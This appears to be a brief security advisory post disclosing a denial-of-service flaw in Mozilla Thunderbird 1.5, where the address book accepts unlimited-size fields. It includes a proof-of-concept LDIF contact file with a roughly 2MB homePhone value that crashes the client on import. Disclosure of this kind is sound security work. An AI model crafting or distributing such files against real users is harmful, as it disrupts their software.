Affected: Mozila Thunderbird 1.5 /possibly other versions/

Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file

POC: create a file.ldif and insert following then import it in address book:
------- start --------
n: cn=Test POC by DrFrancky (at) securax (dot) org [email concealed],mail=drfrancky (at) securax (dot) org [email concealed]
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky (at) securax (dot) org [email concealed]
cn: POC by DrFrancky (at) securax (dot) org [email concealed]
mozillaNickname: DrFrancky
mail: drfrancky (at) securax (dot) org [email concealed]
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------

Credits:
DrFrancky
drfrancky (at) securax (dot) org [email concealed]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iD8DBQFD+zuqck4kcwaj+YIRAn9TAJ949Y6WgjeGoLad8Mf8s93/2LsecQCePp0d
tV73zcRn+T+fOoopawrz8YA=
=nt+S
-----END PGP SIGNATURE-----

[ reply ]